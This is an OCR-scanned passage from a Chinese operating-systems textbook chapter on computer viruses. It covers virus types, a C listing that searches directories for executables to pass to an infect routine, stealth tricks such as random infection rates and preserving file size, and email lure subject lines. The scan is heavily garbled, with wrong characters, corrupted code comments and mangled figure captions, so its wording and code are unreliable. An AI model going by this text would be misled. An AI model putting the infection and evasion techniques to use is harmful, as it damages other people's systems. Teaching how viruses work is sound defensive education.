们 最 后 同意 归还 38 000 个 受害 者 的 274 万 美元 。 











9.7.2 ”病毒 





打开 报纸 ， 总 是 能 够 看 到 关于 病毒 或 蠕虫 攻击 计算 机 的 新 闻 。 它 们 
显然 已 经 成 为 现今 影响 个 人 和 公司 安全 的 主要 问题 。 本 节 我 们 将 介绍 病 
毒 ， 接 下 来 将 介绍 蠕虫。 


笔者 在 撰写 本 节 时 曾 犹 隐 要 不 要 给 出 太 多 的 细节 ， 担 心 它们 会 让 一 
些 人 产生 牙 念 。 然 而 现在 有 很 多 书籍 提供 了 更 为 详细 的 内 容 ， 有 些 其 至 
给 出 代码 (Ludwig,1998) 。 而 且 互 联网 上 也 有 很 多 病毒 方面 的 信息 ， 
笔者 写 出 的 这 些 并 不 足以 构成 什么 威胁 。 另 外 ， 和 人们 在 不 知道 病毒 工作 
原理 的 情况 下 很 难 去 防御 它们 ， 而 且 关 于 病毒 的 传播 有 许多 错误 的 观念 
要 纠正 。 














那么 ， 什 么 是 病毒 呢 ? 长 话 短 说 ， 病 毒 〈virus) 是 一 种 特殊 的 程 
序 ， 它 可 以 通过 把 自己 植 入 到 其 他 程序 中 来 进行 “繁殖 ”， 就 像 生物 界 中 
真正 的 病毒 那样 。 除 了 繁殖 自身 以 外 ， 病 毒 还 可 以 做 许多 其 他 的 事情 。 
蠕虫 很 像 病毒 ， 但 其 不 同 点 是 通过 自己 复制 自己 来 繁殖 。 不 过 这 不 是 我 
们 关注 的 重点 ， 因 此 下 面 我 们 将 用 “病毒 "来 统称 上 面 两 种 恶意 程序 。 有 
关 里 虫 的 内 容 会 在 9.7.3 节 中 讲解 。 

















1. 病 毒 工作 原理 


让 我 们 看 一 下 病毒 有 那些 种 类 以 及 它们 是 如 何 工 作 的 。 病 毒 的 制造 
者 ， 我 们 称 之 为 Virgil， 可 能 用 汇编 语言 〈 或 者 C 语 言 ) 写 了 一 段 很 小 但 
是 有 效 的 病毒 。 在 他 完成 这 个 病毒 之 后 ， 他 利用 一 个 叫做 dropper 的 工具 
把 病毒 插入 到 目 己 计算 机 的 程序 里 ， 然 后 让 被 感染 的 程序 迅速 传播 。 也 
许 贴 在 公告 板 上 ， 也 许 作 为 免费 软件 共 至 在 Internet 上。 这 一 程序 可 能 是 
一 于 激动 人心 的 游戏 ， 一 个 盗版 的 商业 软件 或 其 他 能 引 人 注 意 的 软件 。 
随后 人 们 就 开始 下 载 这 一 病毒 程序 。 














一 旦 病毒 程序 被 安装 到 受害 者 的 计算 机 里 ， 病 毒 就 处 于 休眠 状态 直 
到 被 感染 的 程序 被 执行 。 发 作 时 ， 它 感染 其 他 程序 并 执行 自己 的 操作 。 
通常 ， 在 茶 个 特定 日 期 之 前 病毒 是 不 执行 任何 操作 的 ， 直 到 茶 一 天 它 认 
为 目 己 在 被 关注 前 已 被 广泛 传播 时 才 发 作 。 被 选中 的 日 期 可 能 是 发 送 一 
段 政 治 信息 《如 在 病毒 编写 者 所 在 的 宗教 团体 受辱 的 100 周 年 或 500 周 年 
纪念 日 触发 ) 。 





在 下 面 的 讨论 中 ， 我 们 来 看 一 下 感染 不 同文 件 的 七 种 病毒 。 他 们 是 
共事 者 、 可 执行 程序 、 内 存 、 引 导 矶 区、 驱动器 、 宏 以 及 源 代 码 病毒 。 
ICR, BNI EER A A wes hI. 





共事 者 病毒 (companion virus) 并 不 真正 感染 程序 ， 但 当 程 序 执行 
的 时 候 它 也 执行 。 下 面 的 例子 很 容易 解释 这 个 概念 。 在 MS-DOS 中 ， 当 





用 户 输 入 
prog 


MS-DOS 首 先 查 找 叫 做 prog.com 的 程序 。 如 果 没 有 找到 就 查找 叫做 
prog.exe 的 程序 。 在 Windows 里 ， 当 用 户 点 击 Start (开始) 和 Run〔( 运 
T) 后， 同样 的 结果 会 有 发生 。 现 在 大 多 数 的 程序 都 是 .exe 文 件 ，.com 文 
件 几乎 很 少 了 。 





假设 Virgil 知 道 许 多 人 都 在 MS-DOS 提 示 符 下 或 点 击 Windows 的 Run 
运行 prog.exe。 他 就 能 简单 地 制造 一 个 叫做 prog.com 的 病毒 ， 当 人 们 试 
图 运行 prog (除非 输入 的 是 全 名 prog.exe〉 时 就 可 以 让 病毒 执行 。 当 
prog.com 完 成 了 工作 ， 病 毒 就 让 prog.exe 开 始 运 行 而 用 户 显 然 没 有 这 人 么 
聪明 。 





有 时 候 类 似 的 攻击 也 发 生 在 Windows 操 作 系 统 的 桌面 上 ， 桌 面 上 有 
连接 到 程序 的 快捷 方式 〈 符 号 链接 ) 。 病 毒 能 够 改变 链接 的 目标 ， 并 指 
回 病毒 本 映 。 当 用 户 双 击 图 标 时 ， 病 毒 束 会 运行 。 运 行 完毕 后 ， 病 毒 义 
会 局 动 正常 的 目标 程序 。 

















3. 可 执行 程序 病毒 








更 复杂 的 一 类 病毒 是 感染 可 执行 程序 的 病毒 。 它 们 中 最 简单 的 一 类 
ju 


毒 
会 履 盖 可 执行 程序 ， 这 叫做 履 盖 病毒 〈overwriting virus) 。 它 们 的 感染 








机 制 如 图 9-27 所 示 。 


#include <sys/types.h> /* ER YE MIPOSIX SE AE */ 
#include <sys/stat.h> 

#include <dirent.h> 

#include <fentl.h> 

#include <unistd.h> 

struct stat sbuf; 访 用 于 stat 调 用 ， 看 文件 是 否 为 syym 连 接 */ 


search(char *dir_name) | 

{ 谍 可 执行 表 的 递归 查找 */ 
DIR xdirp; /x* 指 癌 打 开 目 录 流 的 指针 */ 
struct dirent *dp; /* $8 le) A SRE E 


dirp = opendir(dir_name); /* FT F E H ae */ 
if (dirp == NULL) return; PAN HEFT FF A a NG [I */ 
le ooa i* 读 下 一 个 目录 项 sj/ 
dp = readdir(dirp); RS 8. onic ae 
if (dp == NULL) { NULL 表 示 已 完成 操作 */ 
chdir (".."); 旋回 到 父 目 录 */ 
break; /跳出 循环 %/ 


if (dp->d_name[0] ==".’) continue; BEL <.” M “<.” H3R*/ 
Istat(dp->d_name, &sbuf); /#* 项 是 fF 号 连接 吗 ? */ 
if (S_ISLNK(sbuf.st_mode)) continue; /* 跳 过 符号 连接 */ a 
if (chdir(dp->d_name) == 0) { Pedy Rchdirk H, MW Ye zt A oe*/ 
search("."); Pup, HA HRAM 
} else { 此 无 (文件 )， 则 感染 */ 
if (access(dp->d_name,X_OK) == 0) /x* 如 是 可 执行 文件 就 感染 */ 
infect(dp->d_name); 


/*dir 运 行 完毕 ， 关 闭 程序 并 返回 */ 


} 
closedir(dirp); 





图 9-27 在 UNIX 系 统 上 查找 可 执行 文件 的 递归 过 程 








病毒 的 主 程序 首先 将 目 己 的 二 进 制 代码 复制 到 数组 里 ， 这 是 通过 打 
开 argv[0] 并 将 其 读 取 以 便 安 全 调用 来 完成 的 。 然 后 它 通过 将 目 己 变 为 根 
目录 来 截断 由 原来 的 根 目录 开始 的 整个 文件 系统 ， 将 根 目录 作为 参数 调 


用 search 过 程 。 








递归 过 程 search 打 开 一 个 目录 ， 每 次 使 用 readdir 命 令 逐 一 读 取 入 口 
地 址 ， 直 到 返回 值 为 NULL， 说 明 所 有 的 入 口 都 被 读 取 过 。 如 果 入 口 是 
目录 ， 就 将 当前 目录 改 为 该 目录 ， 继 续 递 归 调 用 search; 如 果 入 口 是 可 
执行 文件 ， 就 调用 infect 过 程 来 感染 文件 ， 这 时 把 要 感染 的 文件 名 作为 
参数 。 以 “.” 开 头 的 文件 被 跳 过 以 避免 ”和 ”“..” 目 录 带 来 的 问题 。 同 时 符 
号 链接 也 被 跳 过 ， 因 为 系统 可 以 通过 chdir 系 统 调用 进入 目录 并 通过 转 

到 “..” 来 返回 ， 这 种 对 硬 连接 成 立 ， 对 符号 链接 不 成 立 。 更 完善 的 程序 
同样 可 以 处 理 符号 链接 。 





真正 的 感染 程序 infect ARNA) 仅仅 打开 在 其 参数 中 指定 的 文 
件 并 把 数组 里 存放 的 病毒 代码 复制 到 文件 里 ， 然 后 再 关闭 文件 。 


病毒 可 以 通过 很 多 种 方法 不 断 “ 改 善 "。 第 一 ， 可 以 在 infect 里 插入 产 
生 随 机 数 的 测试 程序 然后 悄然 返回 。 如 调用 超过 了 128 次 病毒 就 会 感 
染 ， 这 样 就 降低 了 病毒 在 大 范围 传播 之 前 就 被 被 检测 出 来 的 概率 。 生 物 
病毒 也 具有 这 样 的 特性 : 那些 能 够 迅速 杀 死 受害 者 的 病毒 不 如 绥 慢 发 作 
的 病毒 传播 得 快 ， 慢 发 作 给 了 病毒 以 更 多 的 机 会 扩散 。 男 外 一 个 方法 是 
保持 较 局 的 感染 京 〈 如 25%) ， 但 是 一 次 大 量 感 染 文件 会 降低 磁盘 性 
能 ， 从 而 易于 被 发 现 。 








第 二 ，infect 可 以 检查 文件 是 否 已 被 感染 。 两 次 感染 相同 的 文件 无 
疑 是 浪费 时 间 。 第 三 ， 可 以 采取 方法 保持 文件 的 修改 时 间 及 文件 大 小 不 
变 ， 这 样 可 以 协助 把 病毒 代码 隐藏 起 来 。 对 大 于 病毒 的 程序 来 说 ， 感 染 











后 程序 大 小 将 保持 不 便 ， 但 对 小 于 病毒 大 小 的 程序 来 说 ， 感 染 后 程序 将 
变 大 。 多 数 病毒 都 比 大 多 数 程 序 小 ， 所 以 这 不 是 一 个 严重 的 问题 。 





一 般 的 病毒 程序 并 不 长 〈 整 个 程序 用 C 语 言 编 写 不 超过 1 页 ， 文 本 段 
编译 后 小 于 2KB) ， 汇 编 语 言 编 写 的 版 本 将 更 小 。Ludwig (1998) 曾经 
给 出 了 一 个 感染 目录 里 所 有 文件 的 MS-DOS 病 毒 ， 用 汇编 语言 编写 并 编 


译 后 仅 有 44 个 字 节 。 








稍 后 的 章节 将 研究 反 病 毒 程 序 ， 这 种 反 病 毒 程 序 可 以 跟 踩 病毒 并 除 
去 它们 。 而 且 ， 在 图 9-27 里 很 有 趣 的 情况 是 ， 病 毒 用 来 得 找 可 执行 文件 
的 方法 也 可 以 被 反 病毒 程序 用 来 跟踪 被 感染 的 文件 并 最 终 清除 病毒 。 感 
染 机 制 与 反感 染 机 制 是 相辅相成 的 ， 所 以 为 了 更 有 效 地 打击 病毒 ， 我 们 
必须 详细 理解 病毒 工作 的 原理 。 











从 Virgil 的 观点 来 说， 病毒 的 致命 问题 在 于 它 太 容易 被 发 现 了 。 毕 
竟 当 被 感染 的 程序 运行 时 ， 病 毒 就 会 感染 更 多 的 文件 ， 但 这 时 该 程序 就 
并 不 能 正常 运行 ， 那 么 用 户 就 会 立即 发 现 。 所 以 ， 有 相当 多 的 病毒 把 自 
己 附 在 正常 程序 里 ， 在 病毒 及 作 时 可 以 让 原来 的 程序 正常 工作 。 这 类 病 


毒 叫做 寄生 病毒 (parasitic virus) 。 














寄生 病毒 可 以 附 在 可 执行 文件 的 前 器 、 后 端 或 者 中 间 。 如 有 果 附 在 前 
端 ， 病 毒 首先 要 把 程序 复制 到 RAM 中 ， 把 自己 附加 到 程序 前 端 ， 然 后 
再 从 RAM 里 复制 回来 ， 整 个 过 程 如 图 9-28b 所 示 。 遗 憾 的 是 ， 这 时 的 程 


序 不 会 在 新 的 虚拟 地 址 里 运行 ， 所 以 病毒 要 么 在 程序 被 移动 后 重新 为 该 
程序 分 配 地 址 ， 要 么 在 完成 目 己 的 操作 后 缩 回 到 虚拟 地 址 0。 





可 执行 
程序 






可 执行 


程序 


可 执行 


程序 


起 始 地 址 





a) b) 


图 928 四 一 段 可 执行 程序 ; 病毒 在 前 端 ; 9 滴 毒 在 后 端 ; Dim AA 
斥 在 程序 里 的 多 余 空间 里 


为 了 避免 从 前 器 装 入 病毒 代码 带 来 的 复杂 操作 ， 大 多 数 病毒 是 后 端 
装 入 的 ， 把 它们 目 己 附 在 可 执行 程序 末端 而 不 是 前 端 ， 并 且 把 文件 头 的 
起 始 地 址 指 回 病 毒 ， 如 图 9-28c 所 示 。 现 在 病毒 要 根据 被 感染 程序 的 不 
同 在 不 同 的 虚拟 地 址 上 运行 ， 这 意味 着 Virgil 必 须 使 用 相对 地 址 ， 而 不 
是 绝对 地 址 来 保证 病毒 是 位 置 独立 的 。 对 资深 的 程序 员 来 说 ， 这 样 做 并 
不 难 ， 并 且 一 些 编译 器 根据 需要 也 可 以 完成 这 件 事 。 























复杂 的 可 执行 程序 格式 ， 如 Windows 里 的 .exe 文 件 和 UNIX 系 统 中 几 
乎 所 有 的 二 进 制 格式 文件 都 拥有 多 个 文本 和 数据 段 ， 可 以 用 装载 程序 在 
内 存 中 迅速 把 这 些 段 组 装 和 分 配 。 在 有 些 系统 中 〈 如 Windows) ， 所 有 


的 段 都 包含 多 个 512 字 节 单 元 。 如 果 某 个 段 不 满 ， 链 接 程 序 会 用 0 填充 。 
知道 这 一 点 的 病毒 会 试图 隐藏 在 这 些 空洞 里 。 如 果 正 好 填 满 多 余 的 空 
间 ， 如 图 9-28d 所 示 ， 整 个 文件 大 小 将 和 未 感染 的 文件 一 样 保持 不 变 ， 
不 过 却 有 了 一 个 附加 物 ， 所 以 隐 合 的 病毒 是 幸运 的 病毒 。 这 类 病毒 叫做 
空 腔 病毒 Ccavity virus) 。 当 然 如 果 装 载 程序 不 把 多 余部 分 闭 入 内 存 ， 


病毒 也 会 男 疯 途径。 








4. 内 存 驻 留 病毒 





到 目前 为 止 ， 我 们 假设 当 被 感染 的 程序 运行 时 ， 病 毒 也 同时 运行 ， 
然后 将 控制 权 交 给 真正 的 程序 ， 最 后 退出 。 内 存 驻 留 病毒 Cmemory- 
resident virus》 与 此 相反 ， 它 们 总 古 驻 留 在 内 存 中 CRAM) ， 要 么 藏 在 
内 存 上 端 ， 要 么 藏 在 下 端的 中 断 变量 中 。 聪 明 的 病毒 其 全 可 以 改变 操作 
系统 的 RAM 分 布 位 图 ， 让 系统 以 为 病毒 所 在 的 区 域 已 经 占用 ， 从 而 如 
免 了 被 其 他 程序 履 兰 。 














典型 的 内 存 驻 留 病毒 通过 把 陷阱 或 中 断 向 量 中 的 内 容 复 制 到 任意 变 
量 中 之 后 ， 将 目 身 的 地 址 放置 其 中 ， 俘 获 陷阱 或 中 断 问 量 ， 从 而 将 该 陷 
阱 或 中 断 指 同 病 毒 。 最 好 的 选择 是 系统 调用 陷阱 ， 这 样 病毒 就 可 以 在 每 
一 次 系统 调用 时 运行 〈 在 核心 态 下 ) 。 病 毒 运行 完 之 后 ， 通 过 跳 转 到 所 
保存 的 陷阱 地 址 重新 激活 真正 的 系统 调用 。 











为 什么 病毒 在 每 次 系统 调用 时 都 要 运行 呢 ? 这 是 因为 病毒 想 感染 程 





序 。 病 毒 可 以 等 待 直到 发 现 一 个 exec 系 统 调用 ， 从 而 判断 这 是 一 个 可 执 
行 二 进 制 (而 且 也 许 是 一 个 有 价值 的 〉 代 码 文件 ， 于 是 决定 感染 它 。 这 
一 过 程 并 不 需要 大 量 的 磁盘 活动 ， 如 图 9-27 所 示 ， 所 以 难以 被 发 现 。 捕 
捉 所 有 的 系统 调用 也 给 了 病毒 潜在 的 能 力 ， 可 以 监视 所 有 的 数据 并 造成 
种 种 危害 。 














5. 引 导 扇 区 病毒 


正如 我 们 在 第 5 草 所 讨论 的 ， 当 大 多 数 计算 机 开机 时 ，BIOS 读 引导 
磁盘 的 主 引 导 记 录放 入 RAM 中 并 运行 。 引 导 程 序 判 断 出 哪 一 个 是 活动 
分 区 ， 从 该 分 区 读 取 第 一 个 忆 区 ， 即 引导 书 区 ， 并 和 运行。 随后， 系统 要 
么 闭 入 操作 系统 要 么 通过 装载 程序 导入 操作 系统 。 但 是 ， 多 年 以 前 
Virgil 的 朋友 发 现 可 以 制作 一 种 病毒 禾 盖 主 引 导 记 录 或 引导 山区 ， 并 能 
造成 灾难 性 的 后 果 。 这 种 叫做 引导 届 区 病毒 (boot sector virus〉， 它 们 
现在 已 十 分 普 衣 了。 





























通 第 引导 司 区 病毒 [包括 MBR〈 主 引导 记录 ) 病毒 ]， 首 先 把 真正 的 
引导 记录 局 区 复制 到 磁盘 的 安全 区 域 ， 这 样 就 能 在 完成 操作 后 正常 引导 
操作 系统 。Microsoft 的 磁盘 格式 化 工具 fdisk 往 往 跳 过 第 一 个 磁道 ， 所 以 
这 是 在 Windows 机 器 中 隐藏 引导 记录 的 好 地 方 。 必 一 个 办 法 是 使 用 磁盘 
内 任意 空 闪 的 而 区 ， 然 后 更 新 坏 山 区 列表 ， 把 隐藏 引导 记录 的 司 区 标记 
为 坏 局 区 。 实 际 上 ， 由 于 病毒 相当 庞大 ， 所 以 它 也 可 以 把 自 映 剩余 的 部 
分 伪装 成 坏 属 区 。 如 果 根 目录 有 足够 大 的 固定 空间 ， 如 在 Windows 98 























中 ， 根 目录 的 末端 也 是 一 个 隐藏 病毒 的 好 地 方 。 真 正 有 攻击 性 的 病毒 其 
至 可 以 为 引导 记录 而 区 和 上 自身 重新 分 配 倒 盘 空 间 ， 并 相应 地 更 新 磁 盘 分 
布 位 图 或 空 几 表 。 这 需要 对 操作 系统 的 内 部 数据 结构 有 详细 的 了 解 ， 不 
过 Virgil 有 一 个 很 好 的 教授 专门 讲解 和 研究 操作 系统 。 


























当 计 算 机 局 动 时 ， 病 毒 把 自身 复制 到 RAM 中 ， 要 么 隐藏 在 顶部 ， 
和 要么 在 未 使 用 的 中 断 问 量 中 。 由 于 此 时 计算 机 处 于 核心 态 ，MMU 处 于 
关闭 状态 ， 没 有 操作 系统 和 反 病 毒 程序 在 运行 ， 所 以 这 对 病毒 来 说 是 天 
赐 民 机。 当 一 切 准备 就 绪 时 ， 病 毒 会 情 动 操作 系统 ， 而 目 己 则 往往 驻 留 
在 内 存 里 ， 所 以 它 能 够 监视 情况 变化 。 














然而 ， 存 在 一 个 如 何 获取 今后 对 系统 的 控制 权 的 问题 。 第 用 的 办 法 
要 利用 一 些 操作 系统 管理 中 断 问 量 的 技巧 。 如 Windows 系 统 在 一 次 中 断 
后 并 不 重 置 所 有 的 中 断 癌 量 。 相 反 ， 系 统 每 次 装 入 一 个 设备 驱动 程序 ， 
每 一 个 都 获取 所 需 的 中 断 向 量 。 这 一 过 程 要 持续 一 分 钟 左 右 。 








这 种 设计 给 了 病毒 以 可 乘 之 机 。 它 可 以 捕获 所 有 中 断 向 量 ， 如 图 9- 
29a 所 示 。 当 加 载 驱 动 程序 时 ， 部 分 回 量 被 禾 亩 ， 但 是 除非 时 钟 驱动 程 
序 首 先 航 载 入 ， 人 否则 会 有 大 量 的 时 钟 中 断 用 来 激活 病毒 。 丢 失 了 打印 机 
中 断 的 情况 如 图 9-29b 所 示 。 只 要 病毒 友 现 有 茶 一 个 中 断 问 量 已 被 覆 
访 ， 它 天 再 次 窗 荔 该 同 量 ， 因 为 这 样 做 是 安全 的 (实际 上 ， 有 些 中 断 问 
量 在 启动 时 被 覆盖 了 好 几 次 ，Virgil 很 明白 是 怎么 回 事 ) 。 重 新 夺回 打 
印 机 控制 权 的 示意 图 如 图 9-29c 所 示 。 在 所 有 的 一 切 都 加 载 完毕 后 ， 病 



































毒 恢 复 所 有 的 中 断 向 量 ， 而 仅 仪 为 自己 保留 了 系统 调用 陷阱 问 量 。 人 至 
此 ， 内 存 驻 留 病毒 控制 了 系统 调用 。 事 实 上 ， 大 多 数 内 存 驻 留 病毒 就 是 


这 样 开 始 运行 的 。 












操作 系统 






操作 系统 





操作 系统 


病毒 





病毒 


图 9-29 习 病 毒 捕获 了 所 有 的 中 断 向 量 和 陷阱 向 量 后 ; DRE R AE 
回 了 打印 机 中 断 向 量 ; 9 病毒 意识 到 打印 机 向 量 的 丢失 并 重新 夺回 了 控 
制 权 


6. 设 备 驱动 病毒 





深入 内 存 有 点 像 洞穴 探险 一 一 你 不 得 不 扭曲 身体 前 进 并 时 刻 担心 物 
体 硬 落 在 头 上 。 如 有 果 操 作 系统 能 够 友好 并 光明 正大 地 装 入 病毒 ， 那 么 事 
情 就 好 办 多 了 。 其 实 只 要 那么 一 点 点 努力 ， 就 可 以 达到 这 一 目标 。 解 决 
办 法 是 感染 设备 驱动 程序 ， 这 类 病毒 叫做 设备 驱动 病毒 〈device driver 
virus) 。 在 Windows 和 有 些 UNIX 系 统 中 ， 设 备 驱 动 程 序 是 位 于 磁盘 里 














或 在 局 动 时 被 加 载 的 可 执行 程序 。 如 果 有 一 个 驱动 程序 被 寄生 病毒 感 
染 ， 病 毒 就 能 够 在 每 次 局 动 时 被 正大 光明 地 载 入 。 而 且 ， 当 驱动 程序 运 
行 在 核心 态 下 ， 一旦 被 加 载 束 会 调用 病毒 ， 从 而 给 病毒 获取 系统 调用 的 
陷阱 癌 量 的 机 会 。 这 样 的 情况 促使 我 们 限制 驱动 程序 运行 在 用 户 态 ， 这 
样 的 话 即 使 驱动 程序 被 病毒 感染 ， 它 们 也 不 能 像 在 内 核 态 的 驱动 程序 
样 ， 造 成 很 大 的 危害 。 

















7. 宏 病毒 


许多 应 用 程序 ， 如 Word 和 Excel， 人 允许 用 户 把 一 大 串 命 令 写 入 宏文 
件 ， 以 便 日 后 一 次 按键 就 能 够 执行 。 宏 可 附 在 菜单 项 里 ， 这 样 当 菜 单项 
被 选中 时 宏 就 可 以 运行 。 在 Microsoft Office 中 ， 宏 可 以 包含 完全 用 
Visual Basic 编 程 语言 编写 的 程序 。 宏 程序 是 解释 执行 而 不 是 编译 执行 
的 ， 但 解释 执行 只 影响 运行 速度 而 不 影响 其 执行 的 效果 。 宏 可 以 是 针对 
特定 的 文档 ， 所 以 Office 就 可 以 为 每 一 个 文档 建立 宏 。 

















现在 我 们 看 一 看 问题 所 在 。Virgil 在 Word 里 建立 了 一 个 文档 并 创建 
了 包含 OPEN FILE 功 能 的 宏 。 这 个 宏 含有 一 个 宏 病 毒 代码 。 然 后 他 将 文 
档 发 送 给 受害 人 ， 受 害 人 很 自然 地 打开 文件 (假设 E-mail 程序 还 没有 打 
开 文 件 ) ， 导 致 OPEN FILE 宏 开始 运行 。 既 然 宏 可 以 包含 任意 程序 ， 它 
就 可 以 做 任何 事情 ， 如 感染 其 他 的 Word 文 档 ， 删 除 文 件 等 。 对 
Microsoft 来 说 ，Word 在 打开 含有 宏 的 文件 时 确实 能 给 出 警告 ,但 大 多 
数 用 户 并 不 理解 警告 的 含义 并 继续 执行 打开 操作 。 而 且 ， 合 法 文件 也 会 


























包含 安 。 还 有 很 多 程序 甚至 不 给 出 敬告， 这样 就 更 难以 发 现 病毒 了 。 














随 痢 E-mail 附 件数 量 的 增长 ， 发 送 能 有 宏 病 毒 的 文档 成 为 越 来 越 严 
重 的 问题 。 比 起 把 真正 的 引导 书 区 隐藏 在 坏 块 列 表 以 及 把 病毒 藏 在 中 央 
向 量 里 ， 这 样 的 病毒 更 容易 编写 。 这 意味 着 更 多 缺乏 专业 知识 的 人 都 能 
制造 病毒 ， 从 而 降低 了 病毒 产品 的 质量 ， 给 病毒 制造 者 带 来 了 坏 名 声 。 














8. 源 代码 病毒 





寄生 病毒 和 引导 区 病毒 对 操作 系统 平台 有 很 高 的 依赖 性 ; 文件 病毒 
的 依赖 性 就 小 得 多 〈Word 运 行 在 Windows 和 Macintosh 上， 但 不 是 
UNIX) 。 最 具 移 植 性 的 病毒 是 源 代 码 病毒 (source code virus) 。 请 想 
象 图 9-27， 寿 该 病毒 不 是 寻找 可 执行 二 进 制 文件 ， 而 是 寻找 C 语 言 程 序 
并 加 以 改变 ， 则 仪 仅 改动 一 行 即 可 (调用 access〉。infect 过 程 可 以 在 每 
个 源 程序 文件 头 插 入 下 面 一 行 : 








#include<virus.h> 





还 可 以 插入 下 面 一 行 来 激活 病毒 : 


run virus(); 





判断 在 什么 地 方 插入 需要 对 C 程 序 代码 进行 分 析 ， 插 入 的 地 方 必须 
能 够 允许 合法 的 过 程 调 用 并 不 会 成 为 无 用 代码 (如 插入 在 return 语 句 后 





面 ) 。 插 入 在 注释 语句 里 也 没什么 效果 ， 插 入 在 循环 语句 里 倒 可 能 是 个 
极 好 的 选择 。 假 设 能 够 正确 地 插入 对 病毒 代码 的 调用 《如 正好 在 main 过 
程 结束 前 ， 或 在 return 语 句 结束 前 〉， 妆 程序 被 编 译 时 就 会 从 virus.h 处 
《虽然 proj.h 可 能 会 引起 更 少 的 注意 ) 获得 病毒 。 








当 程 序 运 行 时 ， 病 毒 也 被 调用 。 病 毒 可 以 做 任何 操作 ， 如 查找 并 感 
染 其 他 的 C 语 言 程 序 。 一 旦 找到 一 个 C 语 言 程 序 ， 病 毒 就 搬入 上 和 面 两 行 
代码 ， 但 这 样 做 仅 对 本 地 计算 机 有 效 ， 并 且 virus.h 必 须 安放 妥当 。 要 使 
病毒 对 远程 计算 机 也 委 效 ， 程 序 中 必须 包括 所 有 的 病毒 源 代 码 。 这 可 以 
通过 把 源 代 码 作为 初始 化 后 字符 串 来 实现 ， 特 别 是 使 用 一 串 32 位 的 十 六 
进 制 整数 来 防止 他 人 识破 企图 。 字 符 串 也 许 会 很 长 ， 但 是 对 于 今天 的 大 
型 代码 而 言 ， 这 十 可 以 轻易 实现 的 。 





对 初学 读者 来 说 ， 所 有 这 些 方法 看 起 来 部 比较 复杂 。 有 人 也 许 会 怀 
疑 这 样 做 是 否 在 操作 上 可 行 。 事 实 上 是 可 行 的 。Virgil 是 极为 出 色 的 程 





9. 病 毒 如 何 传播 





病毒 的 传播 需要 很 多 条 件 。 让 我 们 从 最 古典 的 方式 谈 起 。Virgil 编 
写 了 一 个 病毒 ， 把 它 放 进 了 目 己 的 程序 〈 或 禄 取 来 的 程序 ) 里 ， 然 后 开 
始 分 及 程序 ， 如 放 入 共享 软件 站 点 。 最 后 ， 有 人 下 载 并 运行 了 程序 。 这 








时 有 好 几 种 可 能 。 病 毒 可 能 开始 感染 硬盘 里 的 大 多 数 文件 ， 其 中 有 些 文 
件 被 用 户 共享 给 了 目 己 的 朋友 。 病 毒 也 可 以 试图 感染 硬盘 的 引导 而 区 
一 旦 引导 局 区 被 感染 ， 就 很 容易 在 核心 态 下 放置 内 存 驻 留 病 毒 。 








ee ht in 
被 感染 的 计算 机 是 否 连 接 在 局 域 网 上 ， 如 一 台 机 器 很 可 能 属于 某 个 公司 
或 大 学 的 。 然 后 ， 就 可 以 通过 该 局 域 网 感染 所 有 服务 器 上 未 被 保护 的 文 
件 。 这 种 感染 不 会 扩散 到 已 被 保护 的 文件 ， 但 是 会 让 被 感染 的 文件 运行 
起 来 十 分 奇怪 。 于 是 ， 运 行 这 类 程序 的 用 户 会 寻求 系统 管理 员 的 帮助 ， 
系统 管理 员 会 杀 目 试验 这 些 奇 怪 的 文件 ， 看 看 是 怎么 会 事 。 如 果 系 统管 
理 员 此 时 用 超级 用 户 登录 ， 病 毒 会 感染 系统 代码 、 设 备 驱 动 程序 、 操 作 
系统 和 引导 局 区 。 犯 类 似 这 样 的 一 个 错误 ， 就 会 危及 局 域 网 上 所 有 计算 
机 的 安全 。 

















运行 在 局 域 网 上 的 计算 机 通常 有 能 力 通 过 Internet 或 私人 网 络 登 录 到 
远程 计算 机 上 ， 或 者 甚至 有 权 无 须 登录 束 远 程 执 行 命令 。 这 种 能 力 为 病 
毒 提供 了 更 多 传播 的 机 会 。 所 以 往往 一 个 微小 的 错误 就 会 感染 整个 公 

要 避免 这 种 情况 ， 所 有 的 公司 应 该 制定 统一 的 策略 防止 系统 管理 员 
犯错 误 。 

















另 一 种 传播 病毒 的 方法 是 在 经 常 发布 程序 的 USENET 新 闻 组 或 网 站 
上 张贴 已 被 感染 病毒 的 程序 。 也 可 以 建立 一 个 需要 特别 的 浏览 器 插件 的 
网 页 ， 然 后 确保 插件 被 病毒 感染 上 。 








还 有 一 种 攻击 方式 是 把 感染 了 病毒 的 文档 通过 E-mail 方 式 或 
USENET 新 闻 组 方式 发 送 给 他 人 ， 这 些 文档 被 作为 邮件 的 附件 。 人 们 从 
未 想到 会 去 运行 一 个 陌生 人 邮 给 他 们 的 程序 ， 他 们 也 许 没 有 想到 ， 点 击 
打开 附件 导致 在 自己 的 计算 机 上 释放 了 病毒 。 更 糟 的 是 ， 病 毒 可 以 寻找 
用 户 的 邮件 地 址 得， 然后 把 目 己 转 发 给 地 址 短 里 所 有 的 人 ， 通 闻 这 些 邮 
件 是 以 看 上 去 合法 的 或 有 趣 的 标题 开头 的 。 例 如 : 














Subject: Change of plans 
Subject: Re: that last e-mail 
Subject: The dog died last night 
Subject: I am seriously ill 
Subject: I love you 














当 邮 件 到 达 时 ， 收 信人 看 到 发 件 人 是 朋友 或 同事 ， 就 不 会 怀疑 有 问 
题 。 而 一 旦 邮件 被 打开 就 太 晚 了 。“I LOVE YOU” 病 毒 在 2000 年 6 月 就 是 
通过 这 种 方法 在 世界 范围 内 传播 的 ， 并 导致 了 数 十 亿美 元 的 损失 ，。 








与 病毒 的 传播 相 联 系 的 是 病毒 技术 的 传播 。 在 Internet 上 有 多 个 病毒 
制造 小 组 积极 地 交流 ， 相 互 帮助 开发 新 的 撤 术 、 工 具 和 病毒 。 他 们 中 的 
大 多 数 人 可 能 是 对 病毒 有 洱 好 的 人 而 不 是 职业 罪犯 ,但 带 来 的 后 果 却 是 
灾难 性 的 。 男 一 类 病毒 制造 者 是 军人 ， 他 们 把 病毒 作为 潜在 的 战争 武器 
来 破坏 政 人 的 计算 机 系统 。 











与 病毒 传播 相关 的 力 一 个 话题 是 逃避 检测 。 监 狱 的 计算 设施 非常 
差 ， 所 以 Virgil 宁 愿 避 开 他 们 。 如 果 Virgil 将 最 初 的 病毒 从 家 里 的 计算 机 


张贴 到 网 上 ， 就 会 产生 和 危险。 一 旦 攻击 成 功 ， 警 察 就 能 通过 
BE 


最 近 病 毒 出 
现 过 的 时 间 信 息 跟 踪 合 找 ， 因 为 这 些 信息 最 有 可 能 接近 病毒 


来 源 。 








